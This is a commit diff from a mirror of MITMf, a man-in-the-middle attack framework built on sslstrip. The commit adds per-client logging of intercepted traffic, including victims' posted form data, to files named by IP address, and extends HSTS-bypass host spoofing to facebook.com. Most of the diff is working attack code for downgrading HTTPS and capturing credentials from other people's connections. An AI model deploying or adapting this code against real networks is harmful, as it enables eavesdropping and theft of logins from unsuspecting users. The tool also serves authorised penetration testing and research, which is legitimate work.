github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-16 10:03:52 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

merged changes from dev

Browse source
This commit is contained in:
byt3bl33d3r 2014-11-29 18:17:56 +01:00
commit 9f4ddc5894
8 changed files with 66 additions and 24 deletions
Download patch file Download diff file Expand all files Collapse all files

3
config_files/hsts_bypass.cfg
View file

@ -7,4 +7,5 @@ mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se accounts.google.se = cuentas.google.se
#for facebook #for facebook
www.facebook.com = social.facebook.com www.facebook.com = social.facebook.com
facebook.com = social.facebook.com

6
mitmf.py
View file

@ -28,7 +28,7 @@ if __name__ == "__main__":
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)") slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.") slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file')
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
@ -83,7 +83,7 @@ if __name__ == "__main__":
from sslstrip.StrippingProxyHSTS import StrippingProxy from sslstrip.StrippingProxyHSTS import StrippingProxy
from sslstrip.URLMonitorHSTS import URLMonitor from sslstrip.URLMonitorHSTS import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon) URLMonitor.getInstance().setValues(args.favicon, args.clients)
CookieCleaner.getInstance().setEnabled(args.killsessions) CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load) ProxyPlugins.getInstance().setPlugins(load)
@ -100,7 +100,7 @@ if __name__ == "__main__":
from sslstrip.StrippingProxy import StrippingProxy from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor from sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon) URLMonitor.getInstance().setValues(args.favicon, args.clients)
CookieCleaner.getInstance().setEnabled(args.killsessions) CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load) ProxyPlugins.getInstance().setPlugins(load)

17
sslstrip/ClientRequestHSTS.py
View file

@ -78,11 +78,11 @@ class ClientRequest(Request):
del headers['if-none-match'] del headers['if-none-match']
if 'host' in headers: if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host']) host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host)) logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host headers['host'] = host
headers['securelink'] = '1' headers['securelink'] = '1'
self.setHeader('Host',host) self.setHeader('Host',host)
self.plugins.hook() self.plugins.hook()
@ -116,7 +116,12 @@ class ClientRequest(Request):
host = self.urlMonitor.URLgetRealHost("%s" % lhost) host = self.urlMonitor.URLgetRealHost("%s" % lhost)
client = self.getClientIP() client = self.getClientIP()
path = self.getPathFromUri() path = self.getPathFromUri()
self.content.seek(0, 0)
try:
self.content.seek(0, 0)
except:
pass
postData = self.content.read() postData = self.content.read()
real = self.urlMonitor.real real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict patchDict = self.urlMonitor.patchDict

22
sslstrip/ServerConnection.py
View file

@ -54,7 +54,12 @@ class ServerConnection(HTTPClient):
def sendRequest(self): def sendRequest(self):
if self.command == 'GET': if self.command == 'GET':
logging.info("%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])) message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])
if self.urlMonitor.isClientLogging() is True:
self.urlMonitor.writeClientLog(self.client, self.headers, message)
else:
logging.info(message)
self.plugins.hook() self.plugins.hook()
self.sendCommand(self.command, self.uri) self.sendCommand(self.command, self.uri)
@ -71,7 +76,11 @@ class ServerConnection(HTTPClient):
elif 'keylog' in self.uri: elif 'keylog' in self.uri:
self.plugins.hook() self.plugins.hook()
else: else:
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)) message = "%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)
if self.urlMonitor.isClientLogging() is True:
self.urlMonitor.writeClientLog(self.client, self.headers, message)
else:
logging.warning(message)
self.transport.write(self.postData) self.transport.write(self.postData)
def connectionMade(self): def connectionMade(self):
@ -88,6 +97,8 @@ class ServerConnection(HTTPClient):
self.client.setResponseCode(int(code), message) self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value): def handleHeader(self, key, value):
self.plugins.hook()
if (key.lower() == 'location'): if (key.lower() == 'location'):
value = self.replaceSecureLinks(value) value = self.replaceSecureLinks(value)
@ -100,8 +111,9 @@ class ServerConnection(HTTPClient):
if (value.find('gzip') != -1): if (value.find('gzip') != -1):
logging.debug("Response is compressed...") logging.debug("Response is compressed...")
self.isCompressed = True self.isCompressed = True
if (key.lower() == 'strict-transport-security'):
value = 'max-age=0' #if (key.lower() == 'strict-transport-security'):
# value = 'max-age=0'
elif (key.lower() == 'content-length'): elif (key.lower() == 'content-length'):
self.contentLength = value self.contentLength = value
@ -110,8 +122,6 @@ class ServerConnection(HTTPClient):
else: else:
self.client.setHeader(key, value) self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self): def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None): if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength) self.client.setHeader("Content-Length", self.contentLength)

6
sslstrip/ServerConnectionFactory.py
View file

@ -40,5 +40,7 @@ class ServerConnectionFactory(ClientFactory):
logging.debug("Retrying via SSL") logging.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else: else:
self.client.finish() try:
self.client.finish()
except:
pass

1
sslstrip/StrippingProxy.py
View file

@ -20,6 +20,7 @@ from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest from ClientRequest import ClientRequest
class StrippingProxy(HTTPChannel): class StrippingProxy(HTTPChannel):
'''sslstrip is, at heart, a transparent proxy server that does some unusual things. '''sslstrip is, at heart, a transparent proxy server that does some unusual things.
This is the basic proxy server class, where we get callbacks for GET and POST methods. This is the basic proxy server class, where we get callbacks for GET and POST methods.
We then proxy these out using HTTP or HTTPS depending on what information we have about We then proxy these out using HTTP or HTTPS depending on what information we have about

27
sslstrip/URLMonitor.py
View file

@ -16,7 +16,7 @@
# USA # USA
# #
import re import re, os
class URLMonitor: class URLMonitor:
@ -41,6 +41,25 @@ class URLMonitor:
return (client,url) in self.strippedURLs return (client,url) in self.strippedURLs
def writeClientLog(self, client, headers, message):
if not os.path.exists("./logs"):
os.makedirs("./logs")
if (client.getClientIP() + '.log') not in os.listdir("./logs"):
try:
log_message = "#Log file for %s (%s)\n" % (client.getClientIP(), headers['user-agent'])
except KeyError:
log_message = "#Log file for %s\n" % client.getClientIP()
log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
log_file.write(log_message + message + "\n")
log_file.close()
else:
log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
log_file.write(message + "\n")
log_file.close()
def getSecurePort(self, client, url): def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs: if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)] return self.strippedURLPorts[(client,url)]
@ -69,12 +88,16 @@ class URLMonitor:
self.strippedURLs.add((client, url)) self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port) self.strippedURLPorts[(client, url)] = int(port)
def setFaviconSpoofing(self, faviconSpoofing): def setValues(self, faviconSpoofing, clientLogging):
self.faviconSpoofing = faviconSpoofing self.faviconSpoofing = faviconSpoofing
self.clientLogging = clientLogging
def isFaviconSpoofing(self): def isFaviconSpoofing(self):
return self.faviconSpoofing return self.faviconSpoofing
def isClientLogging(self):
return self.clientLogging
def isSecureFavicon(self, client, url): def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))

8
sslstrip/URLMonitorHSTS.py
View file

@ -64,14 +64,14 @@ class URLMonitor:
#LEO: Sustituir HOST #LEO: Sustituir HOST
if not self.sustitucion.has_key(host): if not self.sustitucion.has_key(host):
lhost = host[:4] lhost = host[:4]
if lhost=="www.": if lhost=="www.":
self.sustitucion[host] = "w"+host self.sustitucion[host] = "w"+host
self.real["w"+host] = host self.real["w"+host] = host
else: else:
self.sustitucion[host] = "web"+host self.sustitucion[host] = "web"+host
self.real["web"+host] = host self.real["web"+host] = host
#logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url)) #logging.debug("LEO stripped URL: %s %s"%(client, url))